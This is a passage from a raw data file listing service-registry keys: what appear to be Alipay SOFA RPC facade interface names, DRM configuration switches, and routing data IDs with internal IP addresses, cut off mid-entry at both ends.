OtherRightsFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.crmhome.common.service.facade.api.materials.MaterialsManageService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.pcloanrepayprod.common.service.facade.service.plan.RepayPlanFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.paymentmng.service.facade.paydecision.PayToolExtCfgManageFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mfinquotationprod.common.service.facade.api.QuotTagFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","config:com.alipay.mrchcommerce.fmcgcore.common.service.facade.api.order.OcOrderManageRzoneFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","com.alipay.routeclient.interfacename:lendweb#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","DATA_ID_30.52.232.105#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.finpromoprod.common.service.facade.spring.SpringTaskFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mobileappcommon.common.service.facade.baas.PublishTaskPlanFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mfinbaseprod.common.service.facade.api.AntHotSearchWordsFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.finassetcore.common.service.lmb.facade.LMBAssetDetailQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.ugrowthprod.common.service.facade.service.UgpTaskService:1.0@tri#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.promobench.core.service.provider.EnvironmentProvider:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.settlequery.common.service.facade.dback.api.DbackQueryService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.adinventory.inventory.facade.InventoryServiceFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fc.process.common.service.facade.callback.ProcessCallback:1.0:deliverOrder_ProcessCallback@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.punishcenter.common.service.facade.PunishActionService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.clivecenter.common.service.facade.api.ClcQueueService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.zdaltair:name=com.alipay.zdal.ldc.tair.processmngTairCache.cacheEngineUrl,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","Alipay.finpwm:name=com.alipay.finpwm.biz.starwish.drm.impl.StarWishDrmImpl.initiativeYebTransInWhiteList,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.mobileapp.common.service.facade.token.LoginTokenFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.merchant.common.service.facade.ShopPageQueryService:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.kbitemprod.common.service.facade.item.KbItemManageFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.findefencecore.common.service.script.api.ScriptInputFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.lendpofprod.common.service.facade.loanapi.support.LoanSupportCommandFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.fininfo:name=com.alipay.fininfo.biz.service.impl.drm.GrayCompatibilityConfigDrm.channelResponseTypeGrayBlackList,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.ipay.coreQualityPlus.common.facade.service.api.CodeChangeAnalysisService:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.lifemng:name=com.alipay.mobilegeocoding.common.service.client.drm.BizClientDrmServiceImpl.dataLoadDegradeSwitch,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.minicenter.common.service.facade.api.paas.InstMiniAppVersionFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.insmobile:name=com.alipay.insmobile.biz.community.drm.CommunityDrm.questionAnsweredCardConfig,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.mobilegw.adapterservice.MobileAdapterService:1.0:basement-bigfishofficial@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.clearingcenter:name=com.alipay.clearingcenter.core.config.drm.DailyCutDRM.openDailyCheckWhenRecovery,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.cifprocess.core.consist.handler.diff.NearCustomizedDiff:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_100.69.243.117#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.insmobile.common.service.facade.consultant.ConsultantAiServiceFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.xview.core.common.facade.CacheQueryProviderService:1.0:iprofile@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.prodcore.service.api.service.ServiceQueryFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.pcreditschedule.service.facade.spi.ExecuteService:1.0:pcreditrmp_test@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alibaba.data.process.facade.mount.DataProcessMountService:1.0:data-process@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mrchiscore.common.service.facade.MrchisCommonApplyFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fc.process.common.service.facade.callback.ProcessCallback:1.0:bkdepmng_fundAmountFreezeCallback1@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.zqueue.client.drm7314#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.taskcenter.common.service.facade.callback.ProcessCallback:1.0.0:TaskCenterCallBackTest@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.insmobile:name=com.alipay.insmobile.drm.insmobiledrmhandler.updateProductJson,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","Alipay.lendpofprod:name=com.alipay.lendpofprod.biz.shared.support.drm.LoanRepayConfigDrm.closeUserDealOpenSwitch,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.cdp.common.service.facade.crep.CrepTriggerCallback:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.assettrans.facade.ecf.api.EcftransQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fc.paramcore.common.service.cache.client.api.ParmDataQueryProxyFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.tallycore.common.service.facade.TemplateQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.openhome.facade.college.materialtag.MaterialTagQueryFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.fincommonbff:name=com.alipay.fincommonbff.drm.Switches.forceCloseCrsQuestion,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","NS_Pub_Servers_TP_W_DW-SCHEDULE-01_*#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","DATA_ID_11.160.159.183#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.kbsales.common.service.facade.bcm.BPProcessCallbackFacade:1.0:payeeAccountLimitationValidator@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.kbopenprod.common.service.facade.check.UiCheckProgramFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.finriskeventseek.facade.MachinePerformanceCountServiceFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.cif.facade.UserAccountArService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.finpwm.facade.sceneinvest.savingplan.api.SavingPlanQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","config:com.alipay.recruitcore.facade.api.enroll.EnrollMerchantQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","Alipay.securitydataservice:name=com.alipay.routeclient.DefaultRouteCoordinator.idcDomainScope,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.gotone.common.service.api.OssFileProcessorService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.sofa.antschedulerconsole.endpoint.facade.ITriggerInstanceRestFacade#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.pcardcore.common.service.facade.system.DataTransferNotifyFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.finpwm.facade.service.CapitalBizQueryFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.adbasiclib.common.service.facade.promotepage.LiuziScoreService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.gfinvest.facade.api.investment.InvestPhaseFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.cicada.bizlogicide.common.service.facade.api.ModuleFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.bizfundprod.common.service.facade.spi.mobilegw.WithdrawFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.ipay.ifundcontrolmodel.service.facade.fundmodel.fundanalyze.forecast.BankAccountForecastFundModelFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fc.argo.spi.publish.CustomDeployFacade:1.0:ins.platform.sell.special@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_192.168.0.109#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.sofa.rpc.elastic.ElasticService:1.0:riskmodelpredict@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.inscommunity.biz.shared.seq.MultiSeqService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.prodmng:name=com.alipay.routeclient.DefaultRouteCoordinator.idcDomainScope,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","DATA_ID_30.55.146.121#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.antgroup.zmxy.zmservicehub.common.service.facade.certifycore.GongAnAuditFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.mybank.bksmarttrade.common.service.facade.TradingRecordQueryService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.gffund.common.service.facade.api.gfpayment.PaymentRealTimeBlockFacade:1.0:gfinvest_PaymentInquiry@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","config:com.alipay.opscloudcore.common.service.facade.execute.ChangeServiceSyncExecuteFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","com.alipay.finassettrade.fintradespi.spi.FinTradeCheckSpi:1.0:finassettrade-check-spi@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alibaba.dataphin.nightswatch.common.facade.monitor.MonitorApi:1.0:dpnightswatch@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_30.25.206.227#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.fc.fcbuservice.common.service.facade.PermissionFacade:1.0:antacl@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_30.23.248.93#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.acctrans.facade.api.fundtrans.FundtransTransFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","cn.com.antcloud.acoffercenter.common.service.facade.product.ProdAttrQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.antinvoice.common.service.facade.api.EinvInvoiceApplyFacade:1.0:einvInvoiceApplyFacade@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.kbservcenter.common.service.facade.FeedbackApplyFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.zdaljdbc:name=com.alipay.zdal.ldc.jdbc.certifymng.certifymngDataSourceOB14.keyWeight,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.finpwm.facade.service.CapitalContractQueryFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.bizrecon.facade.ext.ReconConfMngFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.kwlib:name=com.alipay.cif.drm.PasswordRevokeSwitch.gesturePasswordRevoked,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","Alipay.findtprod:name=com.alipay.antvip.client.internal.drm.DrmSyncControl.successParkIntervalMs,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","Alipay.zpublishuiweb:name=com.alipay.common.tracer.manage.TracerDrm.zdalTairDigestLogThreshold,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.kbsales.common.service.facade.shop.ShopStaffRelationManageFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.instriskcenter.facade.api.InstIndustryInfoManageFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mnotify.biz.client.client.rpc.MNotifyCallbackRPCService:1.0:openitemcore@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mobilerc.common.service.facade.gally.GallyAsyncAnalysisFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mservice.common.service.facade.api.workflow.WorkflowPresKademandFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.routeclient.interfacename:codecompass#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.mservice.common.service.facade.api.monitor.CityServiceMonitorFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.metadata.common.service.tr.meta.MetaFunctionService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","YamlTestApi11Service:1.0@tri#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.insmobile:name=com.alipay.insmobile.drm.InsProductDrmClient.prodActivatedUrlMap,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.zcbsalescenter.common.service.integration.assettrans.AssetTransQueryClient:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_100.88.150.81#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.finassetcore.common.service.faasset.AssetProfileQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.cloud.acsellcore.common.service.facade.ltc.project.ProjectServiceFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.pcloanpayprod.common.service.facade.services.JbCardAmountFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.opscloudcore.riskservice.spi.OpsChngEventListener:1.0:zskynet@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.custdecision.service.questionnaire.QuestionnaireDataFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mpromocenter.common.service.facade.promo.CampConfigQueryService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.opencore.service.facade.message.MessageSubManageFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","SOFA_PRC_TRANSMIT_POINTCORE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fc.argo.spi.publish.CustomDeployFacade:1.0:pcreditdecisionx.stagepay.product@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.opscloudcore.riskservice.spi.OpsChngAsyncRiskService:1.0:accmOpscloud@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.paycore.service.payment.receipt.api.PayReceiptService:1.0:ebppcore@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.lifemng.facade.ebpp.EbppExportConfigFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.opensupport.common.service.facade.admin.ContentCategoryManageFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","config:com.alipay.fc.mif.common.service.facade.MerchantClassificationFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","com.antfinancial.antchain.cloud.endpoint.facade.BlockchainApplyFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","cn.com.antcloud.acnotifycore.common.service.facade.PostTypeFacade#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","Alipay.finpwm:name=com.alipay.finpwm.common.service.integration.drm.loadtest.LoadTestConfigDrm.fundPrecheckConfig,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.sofa.rpc.elastic.ElasticService:1.0:jarguard@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mshopcenter.common.service.facade.api.CategoryQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fc.process.common.service.facade.callback.ProcessCallback:1.0:blackbox_add_user_complete_ProcessCallback@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.revtrans:name=com.alipay.cif.utils.CountryCodeSwitch.countryCode,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.omocore.common.service.facade.AuthFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mobilecsa.common.service.facade.SuperBrandCommonService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.Arch:name=com.alipay.scheduler.common.cluster.resource.ClusterResource.role,version=1.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.csactive.common.service.facade.mng.service.SelfService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.developerops.facade.api.OpsActivityDemoFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_30.50.92.39#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.cifprocess.directory.VersionedDirectoryQueryService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.financingcore.moneyfund.facade.api.MFundFastRedeemService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fc.process.common.service.facade.callback.ProcessCallback:1.0:bkdevops_AppScaleApplyProcessCallback@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.settlequery.common.service.facade.deposit.api.PreAuthQueryService:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.zpaas.facade.api.PaasRequirementFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.scardcenter.common.service.facade.OfflinepayProjectNodeFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.finbatch:name=com.alipay.finsupport.component.cache.masterdata.drm.MasterdataCacheDRM.refreshMDCacheName,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","cn.amberdata.metadata.service.BusinessEventService:1.0:businessEventService@bolt#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.financingcore.common.service.facade.asset.api.query.AssetQuotientQueryService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.ipay.ipromotion.common.service.facade.api.manage.BudgetManageFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.ipay.iliquidity.core.service.transfer.engine.TransferOrderEngine:1.0:collection@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_30.25.239.40#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.fc.fcbuservice.common.service.facade.manager.MenuManager:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.opsconfreg.common.service.facade.PaasContainerFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","NS_Sub_Servers_TP_S_2301#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.iprocess.facade.service.ProceedRecordServiceFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fintradeguard.core.service.repository.PurchaseControlProductRepository:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.govbizcenter.service.facade.accufund.AccuFundQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fc.process.common.service.facade.callback.ProcessCallback:1.0:morderprod_riskApproveProcessCallback@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mobilesearch.common.service.integration.publiccore.PublicBizQueryServiceClient:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.linkw.common.service.facade.OneKeyDeployFacade:1.0:unitestcenter@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","id.dana.bizcenter.common.service.facade.api.BizProviderService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.igdispute.common.service.facade.PreArbitrationFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.antassistant.biz.rest.TestSofaRest#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","config:com.alipay.cif.facade.UserFreezeQueryService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","com.alipay.fintradecenter.common.service.facade.transfer.AccGoldTransferFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_11.158.43.182#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.socialcore.facade.c2c.eval.EvaluateTagFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.ipay.imnotify.common.service.facade.MNotifyManageFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mrchiscore.common.service.facade.operation.opevent.mng.OpEventMngFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fc.process.common.service.facade.callback.ProcessCallback:1.0:mobileaix_mobileaixProcessCallback@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.assettrans.core.service.drm.DataSourceModeDrmResourceInterface:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","NS_Servers_TP_S_SMART#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.antinvoice.core.service.cache.LdcCacheCleanService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.distinguishprod.common.service.facade.activity.ActivityFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.ecocheck.common.service.openapi.CheckProjectServiceApi:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","SOFA-SCHEDULER-S-S-gffintrade-service#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.mobileic.biz.service.rpc.MICRpcService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.superapi.common.core.client.AppInvokeService:1.0:peerpayprod@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.antopo.common.service.facade.biz.application.AppAdmissionFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fincommontaskhub.core.schduler.v2.resourcemanager.service.resourceview.ResourceViewService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.finpwm:name=com.alipay.finpwm.biz.wishsavings.drm.impl.WishSavingsSysDRMResource.starWishManualOrderExecMaxNum,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.pcreditquery.common.api.PcreditQueryConsumeFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.gacplatform.facade.api.GacPlatformServiceFacade:1.0:bkinstassetguar@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.sofa.event.api.input.EventReceiverService:1.0:SL__TP_F_SC_XZY_SERVERLESS_TASK_STREAM_FAILED_FUNC@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mrchiswisdom.platform.common.service.facade.api.tenant.TenantOperationFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.ienvcenter.facade.rpc.FakeRpcFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","SOFA-SCHEDULER-S-S-ALM-SCHEDULER#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","Alipay.gfas:name=com.alipay.slaguard.common.drm.SlaGuardConfigDrm.logLevelMap,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.finfocore.common.service.facade.cds.mng.PositionFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.insiop.common.service.facade.module.InsIopInsppModuleMngFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.alisis.core.service.compass.ServerLoader:1.0:server-register-loader@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.promoorder.common.service.facade.api.PromoOrderManageFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.securitydata.common.service.facade.icontent.IcontentService:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.bioperation.service.facade.api.AssetManageFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.pfunddts.common.facade.api.FundFlowRecoverFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.bizprodmng:name=com.alipay.common.tracer.manage.TracerDrm.zdalDbDigestLogThreshold,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.mobilegw.adapterservice.MobileAdapterService:1.0:basement-insiopbff@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.zdaltair:name=com.alipay.zdal.ldc.tair.iWFBizProdCommonCacheTBaseCache.nativeRuleZones,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.antinvoice.biz.flow.manager.EinvApplyManager:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.zcbsalescenter.common.service.integration.finasmcore.ActivityInfoQueryFacadeClient:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.exriskcenter.common.service.facade.api.DataFactorBuildFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_11.167.218.168#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.mobilechat.common.service.facade.api.BcServiceFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mobileha.facade.alarmanalysis.AppInfoByHaFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.sofa.platform.schedule.concurrent.execute.Executer:1.0:recoveryAccountingTaskExecuter@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.finsign.common.service.facade.wkprod.service.WkConsultService:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mrchasset.common.service.facade.lot.AssetIotAssignRecordFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.zcache:name=com.alipay.zcache.tbase.customerv2.localCacheSwitch,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","config:com.alipay.imif.common.service.facade.v2.LeadsCommonService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","DATA_ID_11.166.137.166#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.rccenter.common.service.facade.RccenterPredictValueFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.finpwm:name=com.alipay.finpwm.biz.starwish.drm.impl.StarWishDrmImpl.triggerLoadNeedRemindTask,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","OLD_CLIENTSERVICE_TEST_7#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.finfoprod.common.service.cds.facade.FrameStrategyFacade:1.0@DEFAULT#@